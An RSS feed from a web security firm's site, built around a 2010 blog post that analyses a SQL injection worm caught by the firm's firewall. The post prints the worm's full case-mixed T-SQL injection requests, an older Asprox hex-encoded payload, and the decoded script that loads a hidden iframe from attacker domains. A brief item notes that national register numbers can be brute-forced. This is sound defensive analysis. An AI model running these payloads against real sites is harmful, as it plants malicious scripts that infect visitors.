<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/"><channel><title>ZION SECURITY.COM - RSS Feed</title><link>http://www.zionsecurity.com</link><pubDate>2010-02-15T10:54:32</pubDate><generator>umbraco v4</generator><description>Pure web application security</description><language>en</language><item><title>8</title><link>http://www.zionsecurity.com/blog/2010/3/8.aspx</link><pubDate>2010-03-08T15:26:43</pubDate><dc:creator>Erwin</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/3/8.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>SQL Injection worm with new injection domain dnf666.net</title><link>http://www.zionsecurity.com/blog/2010/3/8/sql-injection-worm-with-new-injection-domain-dnf666net.aspx</link><pubDate>2010-03-08T15:26:43</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/3/8/sql-injection-worm-with-new-injection-domain-dnf666net.aspx</guid><description><![CDATA[ <p>Our <a href="http://www.zionsecured.com" target="_blank">ZION SECURED WAMAF</a> blocks a lot of attacks lately. Some attacks are worth investigating because they reveal new threats.</p>
<p>Most of you probably know about the Asprox worm? See <a href="http://matchent.com/wpress/?q=node/419" target="_blank">http://matchent.com/wpress/?q=node/419</a></p>
<p>This weekend a bot attacked this blog, protected by <a href="http://www.zionsecured.com" target="_blank">ZION SECURED WAMAF</a>:</p>
<p class="code_format">GET /blog/2010/2/26//solutions.aspx?show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20<br />cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%<br />20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.<br />xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20f<br />EtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0<br />)%20bEgIn%20exec('UpDaTe20%5B'%2B@t%2B'5D%20sEt20%5B'%2B@c%2B'%5D=rtrim(c<br />onvert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT(0x3C736372697074207372633D<br />687474703A2F2F7777772E646E663636362E6E65742F752E6A733E3C2F7363726970743E%<br />20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20<br />tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20t<br />AbLe_cursoR;-- HTTP/1.1<br />User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7<br />Host: www.zionsecurity.com<br />Accept: */*</p>
<p>The User Agent indicates that this is not a browser but the well-known tool curl,&nbsp; running on Windows. This request wants to test if there is data in the database containing the string dnf666. Probably to see if the database is already infected with the malicious payload.</p>
<p>Because we don't reply with HTTP 500 error but redirect to the homepage instead, the worm attempts to inject its payload with the following GET request:</p>
<p class="code_format">GET /blog/2010/2/26//solutions/code-review.aspx?show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR<br />%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,<br />sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20<br />(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20<br />b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_<br />cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2B<br />cAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6<br />E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20tAbLe_<br />cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20<br />tAbLe_cursoR;-- HTTP/1.1<br />User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7<br />Host: www.zionsecurity.com<br />Accept: */*</p>
<p>Comparing this with the original payload that you can find here shows that the attack above is from a different worm then Asprox, <a href="http://chaptersinwebsecurity.blogspot.com/2008/07/asprox-silent-defacement.html" target="_blank">http://chaptersinwebsecurity.blogspot.com/2008/07/asprox-silent-defacement.html:</a></p>
<p class="code_format">DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636<br />8617228323535292C40432076617263686172283430303029204445434C41524520546162<br />6C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622<br />E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220<br />776865726520612E69643D622E696420616E6420612E78747970653D27752720616E64202<br />8622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D<br />323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7<br />2204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20<br />40542C4043205748494C4528404046455443485F5354415455533D302920424547494E206<br />57865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727<br />223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646<br />F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27<br />272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B65202727252<br />23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F<br />7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272<br />727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F<br />2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4<br />3415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);--</p>
<p><strong>First of all:</strong></p>
<p>The worm uses a mix of small and big caps, for example "dEcLaRe" or "fEtCh next FrOm tAbLe". This is to bypass web application firewalls or filters that trigger on DECLARE, FETCH NEXT FROM TABLE, .. so this is interesting.</p>
<p>The same way to inject the malicious payload is used with CAST:</p>
<p class="code_format">3C736372697074207372633D687474703A2F2F7777772E646E663636362E6E65742F752<br />E6A733E3C2F7363726970743E</p>
<p>This can be ASCII HEX decoded using Burp Decoder, resulting in &lt;script src=http://www.dnf666.net/u.js&gt;&lt;/script&gt;.</p>
<p>Loading this script (dangerous!) returns:</p>
<p class="code_format">try{__m}catch(e){__m=1;document.title=document.title.replace(/\&lt;(\w|\W)*\&gt;/,"");document.write("&lt;iframe src=http://www.dnf666.net/cnzz.html width=0 height=0&gt;&lt;/iframe&gt;");}</p>
<p>this returns:</p>
<p class="code_format">&lt;div style=display:none&gt;&lt;script src="http://s10.cnzz.com/stat.php?id=1990191&amp;web_id=1990191" language="JavaScript"&gt;&lt;/script&gt;&lt;/div&gt;</p>
<p>Google has not listed this cnzz.com domain as malicious, but it was malicious in the past:</p>
<p>Safe Browsing<br />Diagnostic page for cnzz.com</p>
<p>What is the current listing status for cnzz.com?</p>
<p>This site is not currently listed as suspicious.</p>
<p>What happened when Google visited this site?</p>
<p>Of the 132 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-03-07, and the last time suspicious content was found on this site was on 2010-03-07.</p>
<p>Malicious software includes 224 scripting exploit(s), 22 exploit(s), 5 trojan(s).</p>
<p>Malicious software is hosted on 1 domain(s), including cmzz.3322.org/.</p>
<p>This site was hosted on 9 network(s) including AS17672 (CHINATELECOM), AS4847 (CNIX), AS4808 (CHINA169).</p>
<p>Has this site acted as an intermediary resulting in further distribution of malware?</p>
<p>Over the past 90 days, cnzz.com did not appear to function as an intermediary for the infection of any sites.</p>
<p>Has this site hosted malware?</p>
<p>Yes, this site has hosted malicious software over the past 90 days. It infected 89 domain(s), including 360quan.com/, xsdyy.com/, phototh.com/.</p>
<p>Visiting this URL is blocked by ScanSafe:</p>
<p><img src="/media/28215/accessdenied_600x296.jpg"  width="600"  height="296" alt="The web resource http://s10.cnzz.com/stat.php?id=1990191&amp;web_id=1990191 has been deemed by your administrator to be unsafe or unsuitable for you to access. The resource has been blocked. No further action is required. Reason: Adware was found during a scan of this file request"/></p>
<p>&nbsp;</p>
<p>So it's basically the same like Asprox, injecting a script tag to a malicious file.</p>
<p>Googling for the string dnf666.net/u.js already reveals some victims, including some high profile sites!</p>
<p>Be careful when browsing!</p>]]></description><content:encoded><![CDATA[ <p>Our <a href="http://www.zionsecured.com" target="_blank">ZION SECURED WAMAF</a> blocks a lot of attacks lately. Some attacks are worth investigating because they reveal new threats.</p>
<p>Most of you probably know about the Asprox worm? See <a href="http://matchent.com/wpress/?q=node/419" target="_blank">http://matchent.com/wpress/?q=node/419</a></p>
<p>This weekend a bot attacked this blog, protected by <a href="http://www.zionsecured.com" target="_blank">ZION SECURED WAMAF</a>:</p>
<p class="code_format">GET /blog/2010/2/26//solutions.aspx?show=Solutions';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20<br />cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%<br />20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.<br />xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20f<br />EtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0<br />)%20bEgIn%20exec('UpDaTe20%5B'%2B@t%2B'5D%20sEt20%5B'%2B@c%2B'%5D=rtrim(c<br />onvert(varchar(8000),%5B'%2B@c%2B'%5D))%2BcAsT(0x3C736372697074207372633D<br />687474703A2F2F7777772E646E663636362E6E65742F752E6A733E3C2F7363726970743E%<br />20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20<br />tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20t<br />AbLe_cursoR;-- HTTP/1.1<br />User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7<br />Host: www.zionsecurity.com<br />Accept: */*</p>
<p>The User Agent indicates that this is not a browser but the well-known tool curl,&nbsp; running on Windows. This request wants to test if there is data in the database containing the string dnf666. Probably to see if the database is already infected with the malicious payload.</p>
<p>Because we don't reply with HTTP 500 error but redirect to the homepage instead, the worm attempts to inject its payload with the following GET request:</p>
<p class="code_format">GET /blog/2010/2/26//solutions/code-review.aspx?show=Code+review';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR<br />%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,<br />sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20<br />(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20<br />b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_<br />cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20%5B'%2B@t%2B'%5D%20sEt%20%5B'%2B@c%2B'%5D=rtrim(convert(varchar(8000),%5B'%2B@c%2B'%5D))%2B<br />cAsT(0x3C736372697074207372633D687474703A2F2F7777772E646E663636362E6<br />E65742F752E6A733E3C2F7363726970743E%20aS%20vArChAr(53))%20where%20%5B'%2B@c%2B'%5D%20not%20like%20''%dnf666%''')%20fEtCh%20next%20FrOm%20tAbLe_<br />cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20<br />tAbLe_cursoR;-- HTTP/1.1<br />User-Agent: curl/7.19.7 (i386-pc-win32) libcurl/7.19.7<br />Host: www.zionsecurity.com<br />Accept: */*</p>
<p>Comparing this with the original payload that you can find here shows that the attack above is from a different worm then Asprox, <a href="http://chaptersinwebsecurity.blogspot.com/2008/07/asprox-silent-defacement.html" target="_blank">http://chaptersinwebsecurity.blogspot.com/2008/07/asprox-silent-defacement.html:</a></p>
<p class="code_format">DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636<br />8617228323535292C40432076617263686172283430303029204445434C41524520546162<br />6C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622<br />E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220<br />776865726520612E69643D622E696420616E6420612E78747970653D27752720616E64202<br />8622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D<br />323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F7<br />2204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F20<br />40542C4043205748494C4528404046455443485F5354415455533D302920424547494E206<br />57865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727<br />223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646<br />F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27<br />272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B65202727252<br />23E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F<br />7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272<br />727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F<br />2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4<br />3415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);--</p>
<p><strong>First of all:</strong></p>
<p>The worm uses a mix of small and big caps, for example "dEcLaRe" or "fEtCh next FrOm tAbLe". This is to bypass web application firewalls or filters that trigger on DECLARE, FETCH NEXT FROM TABLE, .. so this is interesting.</p>
<p>The same way to inject the malicious payload is used with CAST:</p>
<p class="code_format">3C736372697074207372633D687474703A2F2F7777772E646E663636362E6E65742F752<br />E6A733E3C2F7363726970743E</p>
<p>This can be ASCII HEX decoded using Burp Decoder, resulting in &lt;script src=http://www.dnf666.net/u.js&gt;&lt;/script&gt;.</p>
<p>Loading this script (dangerous!) returns:</p>
<p class="code_format">try{__m}catch(e){__m=1;document.title=document.title.replace(/\&lt;(\w|\W)*\&gt;/,"");document.write("&lt;iframe src=http://www.dnf666.net/cnzz.html width=0 height=0&gt;&lt;/iframe&gt;");}</p>
<p>this returns:</p>
<p class="code_format">&lt;div style=display:none&gt;&lt;script src="http://s10.cnzz.com/stat.php?id=1990191&amp;web_id=1990191" language="JavaScript"&gt;&lt;/script&gt;&lt;/div&gt;</p>
<p>Google has not listed this cnzz.com domain as malicious, but it was malicious in the past:</p>
<p>Safe Browsing<br />Diagnostic page for cnzz.com</p>
<p>What is the current listing status for cnzz.com?</p>
<p>This site is not currently listed as suspicious.</p>
<p>What happened when Google visited this site?</p>
<p>Of the 132 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-03-07, and the last time suspicious content was found on this site was on 2010-03-07.</p>
<p>Malicious software includes 224 scripting exploit(s), 22 exploit(s), 5 trojan(s).</p>
<p>Malicious software is hosted on 1 domain(s), including cmzz.3322.org/.</p>
<p>This site was hosted on 9 network(s) including AS17672 (CHINATELECOM), AS4847 (CNIX), AS4808 (CHINA169).</p>
<p>Has this site acted as an intermediary resulting in further distribution of malware?</p>
<p>Over the past 90 days, cnzz.com did not appear to function as an intermediary for the infection of any sites.</p>
<p>Has this site hosted malware?</p>
<p>Yes, this site has hosted malicious software over the past 90 days. It infected 89 domain(s), including 360quan.com/, xsdyy.com/, phototh.com/.</p>
<p>Visiting this URL is blocked by ScanSafe:</p>
<p><img src="/media/28215/accessdenied_600x296.jpg"  width="600"  height="296" alt="The web resource http://s10.cnzz.com/stat.php?id=1990191&amp;web_id=1990191 has been deemed by your administrator to be unsafe or unsuitable for you to access. The resource has been blocked. No further action is required. Reason: Adware was found during a scan of this file request"/></p>
<p>&nbsp;</p>
<p>So it's basically the same like Asprox, injecting a script tag to a malicious file.</p>
<p>Googling for the string dnf666.net/u.js already reveals some victims, including some high profile sites!</p>
<p>Be careful when browsing!</p>]]></content:encoded></item><item><title>comment by Erwin (1)</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-erwin-(1).aspx</link><pubDate>2010-03-08T14:08:33</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-erwin-(1).aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Armorlogic</title><link>http://www.zionsecurity.com/partners/armorlogic.aspx</link><pubDate>2010-03-03T17:37:36</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/armorlogic.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/media/27975/armorlogic.png" width="82" height="118" alt="armorlogic" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>About Armorlogic</span></p>
<p class="contenttext">Armorlogic is focused exclusively on web application and website security and was founded in 2004 by leading Internet security specialists from some of the world's largest Internet security consulting companies.</p>
<p class="contenttext">Armorlogic's goal is to provide a cost effective way to proactively protect web sites, web applications, and their users from attack in a way that network firewalls and intrusion detection systems can not.</p>
<p class="contenttext">Easy to install, maintain and use, Profense is used by thousands of businesses, governments and organizations all over the world to protect Internet facing applications, servers and data. To maximize protection and minimize maintenance and adjustment, Armorlogic believes that the positive security model should be the governing principle of IT security solutions.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY uses the technology of Profense for <a href="http://www.zionsecured.com" target="_blank">ZION SECURED WAMAF</a>, a Web Application Firewall as-a-Service. However, we can also install, configure and monitor&nbsp;the technology of Profense in your datacenter.</p>
<p><a href="/media/3385/app-firewall-wp.pdf" target="_blank"></a></p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/media/27975/armorlogic.png" width="82" height="118" alt="armorlogic" style="float: right;"/><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>About Armorlogic</span></p>
<p class="contenttext">Armorlogic is focused exclusively on web application and website security and was founded in 2004 by leading Internet security specialists from some of the world's largest Internet security consulting companies.</p>
<p class="contenttext">Armorlogic's goal is to provide a cost effective way to proactively protect web sites, web applications, and their users from attack in a way that network firewalls and intrusion detection systems can not.</p>
<p class="contenttext">Easy to install, maintain and use, Profense is used by thousands of businesses, governments and organizations all over the world to protect Internet facing applications, servers and data. To maximize protection and minimize maintenance and adjustment, Armorlogic believes that the positive security model should be the governing principle of IT security solutions.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY uses the technology of Profense for <a href="http://www.zionsecured.com" target="_blank">ZION SECURED WAMAF</a>, a Web Application Firewall as-a-Service. However, we can also install, configure and monitor&nbsp;the technology of Profense in your datacenter.</p>
<p><a href="/media/3385/app-firewall-wp.pdf" target="_blank"></a></p>]]></content:encoded></item><item><title>Web Application Firewall</title><link>http://www.zionsecurity.com/solutions/web-application-firewall.aspx</link><pubDate>2010-03-03T17:21:15</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/solutions/web-application-firewall.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Web Application Firewall</span></p>
<p class="contenttext">A Web Application Firewall (WAF) is a layer 7 Firewall (often called proxy firewalls). Because it acts on the application layer, it may inspect the contents of the traffic, blocking specified content, such as certain websites, viruses and attempts to exploit known logical flaws in client software.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY offers as well commercial Web Application Firewall&nbsp;solutions like <a href="http://www.zionsecurity.com/partners/f5.aspx?show=F5">F5</a> and&nbsp;<a href="/partners/armorlogic.aspx">Profense</a>, as&nbsp;open source solutions&nbsp;like <a href="http://www.zionsecurity.com/partners/breach-security.aspx?show=Breach+Security">Modsecurity</a>. Our security operations team can install and configure these types&nbsp;of WAF's in your infrastructure. &nbsp;</p>
<p class="contenttext">However the disadvantage of a WAF is that the&nbsp;monitoring of the WAF&nbsp;needs a certain level of web security expertise. This is one of the main reasons why most organizations do not have yet a WAF installed. That's why ZI<strong class="red">O</strong>N SECURITY has developed a unique solution, called <a href="http://www.zionsecured.com" target="_blank">ZION SECURED WAMAF</a>.</p>
<p class="contenttext">ZION SECURED WAMAF is Security-as-a-Service and completely managed and monitored by our web security experts. ZION SECURED WAMAF protects your web site(s) and web server(s) against attacks and generates detailed reports of detected attacks. More information on <a href="http://www.zionsecured.com">www.zionsecured.com</a>.</p>
<p class="contenttext">By using a combination of a WAF with our vulnerability assessment solution <a href="http://www.zionsecurity.com/solutions/zion-verified.aspx?show=ZION+VERIFIED">ZION VERIFIED</a>,&nbsp;organizations can rest assured that their web applications are secure. The website will be protected to the maximum and your developers will learn how to write <a href="http://www.zionsecurity.com/solutions/code-review.aspx?show=Code+review">secure code </a>in the long run.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Web Application Firewall</span></p>
<p class="contenttext">A Web Application Firewall (WAF) is a layer 7 Firewall (often called proxy firewalls). Because it acts on the application layer, it may inspect the contents of the traffic, blocking specified content, such as certain websites, viruses and attempts to exploit known logical flaws in client software.</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY offers as well commercial Web Application Firewall&nbsp;solutions like <a href="http://www.zionsecurity.com/partners/f5.aspx?show=F5">F5</a> and&nbsp;<a href="/partners/armorlogic.aspx">Profense</a>, as&nbsp;open source solutions&nbsp;like <a href="http://www.zionsecurity.com/partners/breach-security.aspx?show=Breach+Security">Modsecurity</a>. Our security operations team can install and configure these types&nbsp;of WAF's in your infrastructure. &nbsp;</p>
<p class="contenttext">However the disadvantage of a WAF is that the&nbsp;monitoring of the WAF&nbsp;needs a certain level of web security expertise. This is one of the main reasons why most organizations do not have yet a WAF installed. That's why ZI<strong class="red">O</strong>N SECURITY has developed a unique solution, called <a href="http://www.zionsecured.com" target="_blank">ZION SECURED WAMAF</a>.</p>
<p class="contenttext">ZION SECURED WAMAF is Security-as-a-Service and completely managed and monitored by our web security experts. ZION SECURED WAMAF protects your web site(s) and web server(s) against attacks and generates detailed reports of detected attacks. More information on <a href="http://www.zionsecured.com">www.zionsecured.com</a>.</p>
<p class="contenttext">By using a combination of a WAF with our vulnerability assessment solution <a href="http://www.zionsecurity.com/solutions/zion-verified.aspx?show=ZION+VERIFIED">ZION VERIFIED</a>,&nbsp;organizations can rest assured that their web applications are secure. The website will be protected to the maximum and your developers will learn how to write <a href="http://www.zionsecurity.com/solutions/code-review.aspx?show=Code+review">secure code </a>in the long run.</p>]]></content:encoded></item><item><title>comment by Pieter Verhaeghe</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-pieter-verhaeghe.aspx</link><pubDate>2010-03-03T15:13:23</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-pieter-verhaeghe.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Johan</title><link>http://www.zionsecurity.com/blog/2010/3/2/update-about-the-rijksregisternumber/comment-by-johan.aspx</link><pubDate>2010-03-03T14:58:47</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/3/2/update-about-the-rijksregisternumber/comment-by-johan.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Erwin </title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-erwin-.aspx</link><pubDate>2010-03-03T14:44:07</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-erwin-.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Wim Leers</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-wim-leers.aspx</link><pubDate>2010-03-03T13:35:20</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-wim-leers.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Amedee Van Gasse (1)</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-amedee-van-gasse-(1).aspx</link><pubDate>2010-03-03T13:14:32</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-amedee-van-gasse-(1).aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Amedee Van Gasse</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-amedee-van-gasse.aspx</link><pubDate>2010-03-03T13:09:18</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-amedee-van-gasse.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Rémi (1)</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-rémi-(1).aspx</link><pubDate>2010-03-03T10:32:31</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-rémi-(1).aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Erwin</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-erwin.aspx</link><pubDate>2010-03-03T10:27:16</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-erwin.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Rémi</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-rémi.aspx</link><pubDate>2010-03-03T10:08:32</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-rémi.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>RE: Mollom HTTPModule</title><link>http://www.zionsecurity.com/downloads/products/mollom-httpmodule/re-mollom-httpmodule.aspx</link><pubDate>2010-03-03T09:21:12</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/downloads/products/mollom-httpmodule/re-mollom-httpmodule.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Jan</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-jan.aspx</link><pubDate>2010-03-02T14:02:41</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-jan.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>comment by Fang</title><link>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-fang.aspx</link><pubDate>2010-03-02T12:55:05</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/2/26/unsecure-implementation-of-eid-authentication-in-drupal/comment-by-fang.aspx</guid><description><![CDATA[ ]]></description><content:encoded><![CDATA[ ]]></content:encoded></item><item><title>Update about the Rijksregisternumber</title><link>http://www.zionsecurity.com/blog/2010/3/2/update-about-the-rijksregisternumber.aspx</link><pubDate>2010-03-02T12:11:31</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/blog/2010/3/2/update-about-the-rijksregisternumber.aspx</guid><description><![CDATA[ <p>We got some reactions concerning the Rijksregisternumber used by the eID module.</p>
<p>The five random numbers are not all five random. The last two are a checksum for the entire number, using a DIV 97. The first three are even numbers for male citizens, and odd numbers for female citizens.</p>
<p>So this means that we can brute-force a Rijksregisternumber in 500 or 499 attempts.</p>
